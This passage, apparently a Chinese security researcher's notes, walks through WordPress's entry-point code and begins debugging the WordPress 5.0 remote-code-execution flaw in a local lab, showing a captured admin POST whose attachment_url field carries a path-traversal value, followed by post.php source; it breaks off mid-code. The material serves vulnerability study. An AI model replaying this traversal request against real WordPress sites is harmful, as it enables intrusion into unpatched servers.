一、WordPress源码分析
wordpress是单一入口,最初调用的是index.php
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
index.php-> wp-blog->header.php,执行wp()
require_once( dirname( __FILE__ ) . '/wp-load.php' );
// Set up the WordPress query.
wp();
// Load the theme template.
require_once( ABSPATH . WPINC . '/template-loader.php' );
—> wp-load.php
—>wp-config.php 配置数据库等
—> wp-setting.php
二、WordPress5.0漏洞调试分析
define('AUTOMATIC_UPDATER_DISABLED',true);
在登陆后台之前在wp-config.php中加入这个,要不然wp会自动更新修复Bug
(1)WordPress 5.0 RCE 详细分析
看到在上传图片文件后,修改信息update的时候处理的php文件为/wp-admin/post.php
POST /WordPress/wp-admin/post.php HTTP/1.1
Host: 192.168.1.38
Content-Length: 1024
Cache-Control: max-age=0
Origin: http://192.168.1.38
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.1.38/WordPress/wp-admin/post.php?post=37&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7C209c5042ff858e675c714458adcf73706902372731d51ffd93417748d6348b23; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7Cb58cb1615de8a8e460b252db61702533aeb2c331690ebfdf7f0f938aac4d8f19; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1559094801
Connection: close
_wpnonce=11ee4d6745&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=attachment&original_post_status=inherit&referredby=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_ID=37&meta-box-order-nonce=907417e7f4&closedpostboxesnonce=dcc054a1b3&post_title=1&samplepermalinknonce=baeaaafb2f&excerpt=&_wp_attachment_image_alt=&content=11111111111&attachment_url=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-content%2Fuploads%2F2019%2F05%2F1-6.jpg%23%2F..%2F..%2F..%2F..%2Fthemes%2Ftwentynineteen%2F16-e1559100927286.jpg&original_publish=Update&save=Update&advanced_view=1&comment_status=open&add_comment_nonce=5665e358d9&_ajax_fetch_list_nonce=1fd62550b6&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_name=1-3&post_author_override=1
wp-admin/post.php
<?php
/**
* Edit post administration panel.
*
* Manage Post actions: post, edit, delete, etc.
*
* @package WordPress
* @subpackage Administration
*/
/** WordPress Administration Bootstrap */
require_once( dirname( __FILE__ ) . '/admin.php' );
$parent_file = 'edit.php';
$submenu_file = 'edit.php';
wp_reset_vars( array( 'action' ) );
if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) {
wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
} elseif ( isset( $_GET['post'] ) ) {
$post_id = $post_ID = (int) $_GET['post'];
} elseif ( isset( $_POST['post_ID'] ) ) {
$post_id = $post_ID = (int) $_POST['post_ID'];
} else {
$post_id = $post_ID = 0;
}
/**
* @global string $post_type
* @global object $post_type_object
* @global WP_Post $post
*/
global $post_type, $post_type_object, $post;
if ( $post_id ) {
$post = get_post( $post_id );
}
if ( $post ) {
$post_type = $post->post_type;
$post_type_object = get_post_type_object( $post_type );
}
if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) {
wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
}
if ( isset( $_POST['deletepost'] ) ) {